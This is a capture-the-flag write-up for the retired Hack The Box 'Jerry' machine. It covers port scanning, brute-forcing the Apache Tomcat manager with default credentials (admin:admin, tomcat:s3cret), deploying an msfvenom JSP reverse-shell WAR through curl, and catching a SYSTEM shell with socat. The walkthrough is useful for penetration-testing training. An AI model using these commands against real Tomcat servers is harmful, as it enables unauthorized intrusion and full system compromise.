This is a writeup for the retired Hack The Box Jerry machine.
- Machine URL: https://www.hackthebox.com/machines/jerry
- Machine IP: 10.10.10.95
- Time required: 1 h
Solution Summary
- Weak credentials (CWE-1392) in Apache Tomcat lets users upload RCE payloads.
- Using the RCE payload, an attacker can immediately escalate to Windows system (administrator) privileges.
Solution
The following steps are needed to retrieve the flags:
- Find out frequently used default passwords for Tomcat instances.
- Craft a reverse shell payload using Metasploit’s
msfvenom. - Upload the reverse shell payload using Tomcat’s deploy mechanism and launch the reverse shell
- Read out the flags from the Administrator’s desktop.
Nmap
Did you know that on Linux, ping is run as a setuid binary? Now that I know, it
makes sense. Ping needs to send out raw (non-TCP) packets. Handling raw sockets
required the CAP_NET_RAW capability on Linux.
For example, the specific code that configures ping to be a setuid binary in NixOS can be found here.
# Nmap seems to be a bit stubborn without sudo, as it appears to think the host
# is down otherwise and blocking ping probes
sudo nmap -sV -sC -A -oX machines/jerry/nmap.xml \
10.10.10.95
Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-09 10:38 JST
Nmap scan report for 10.10.10.95
Host is up (0.22s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 2012|8|Phone|7 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 (88%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Embedded Standard 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 291.39 ms 10.10.16.1
2 291.38 ms 10.10.10.95
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.62 seconds
To be sure we don’t miss any TCP ports, we run a second TCP-only scan:
sudo nmap -p- -sT -oX machines/jerry/nmap_tcp.xml 10.10.10.95
We don’t find any other open ports after running an exhaustive scan:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-09 10:44 JST
Nmap scan report for 10.10.10.95
Host is up (0.084s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 107.45 seconds
Findings:
Apache Tomcat/7.0.88running on port 8080
Apache Tomcat
Landing page of Jerry’s Apache Tomcat
Open in new tab
(full image size 117 KiB)
Apache Tomcat version 7.0.88 was released in 2018. There are a lot of vulnerabilities.
Three vulnerabilities look interesting because they are low-complexity and can lead to an RCE.
It turns out that, luckily, we can make use of a much easier vulnerability, as we will see below.
We try to identify interesting URLs:
feroxbuster --wordlist SecLists/Discovery/Web-Content/common.txt \
--threads 10 --scan-limit 1 \
--url http://10.10.10.95:8080 --silent | tee machines/jerry/feroxbuster.log
The following URL sticks out:
http://10.10.10.95:8080/manager/html
Cracking the admin panel password
Why don’t we brute-force our way into the admin panel located at
/manager/html? Here’s what we see when we try to access it without any
authentication:
curl http://10.10.10.95:8080/manager/html -I
We get a 401 status code with Basic authentication required hinted at in the
WWW-Authenticate header.
HTTP/1.1 401 Unauthorized
Server: Apache-Coyote/1.1
Cache-Control: private
Expires: Thu, 01 Jan 1970 02:00:00 EET
WWW-Authenticate: Basic realm="Tomcat Manager Application"
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Mon, 09 Sep 2024 09:15:37 GMT
We try to fuzz the password using Patator.
patator.py http_fuzz \
url=http://10.10.10.95:8080/manager/html \
method=GET \
0=SecLists/Usernames/cirt-default-usernames.txt \
1=SecLists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt \
user_pass=FILE0:FILE1 \
-x ignore:code=401
admin:admin does the trick and we are logged in. tomcat:s3cret also seems
to work.
Logged in admin screen
Open in new tab
(full image size 114 KiB)
Uploading a reverse shell
From /docs/manager-howto.html:
http://localhost:8080/manager/text/deploy?path=/foo
Upload the web application archive (WAR) file that is specified as the request data in this HTTP PUT request, install it into the appBase directory of our corresponding virtual host, and start, deriving the name for the WAR file added to the appBase from the specified path. The application can later be undeployed (and the corresponding WAR file removed) by use of the /undeploy command.
We craft a shell using msfvenom:
msfvenom --payload java/jsp_shell_reverse_tcp \
--platform windows --arch x86 \
LHOST=10.10.16.6 \
LPORT=4444 \
-f war > machines/jerry/msfvenom_shell.war
Then, we use CURL to upload the msfvenom_shell.war shell created above:
curl -u "tomcat:s3cret" "http://10.10.10.95:8080/manager/text/deploy?path=/shell" \
--upload-file machines/jerry/msfvenom_shell.war
The upload works:
OK - Deployed application at context path /shell
We launch Socat locally:
socat -d TCP4-LISTEN:4444 STDIO
# Somewhere else
curl http://10.10.10.95:8080/shell/
Retrieve flags
The shell works and we are already a privileged user:
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\apache-tomcat-7.0.88>whoami
nt authority\system
We find the flags on the Administrator’s desktop:
dir C:\Users\Administrator\Desktop\flags\
06/19/2018 07:09 AM <DIR> .
06/19/2018 07:09 AM <DIR> ..
06/19/2018 07:11 AM 88 2 for the price of 1.txt
1 File(s) 88 bytes
2 Dir(s) 2,397,736,960 bytes free
Print out the flags:
type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt"
The flags are revealed:
user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX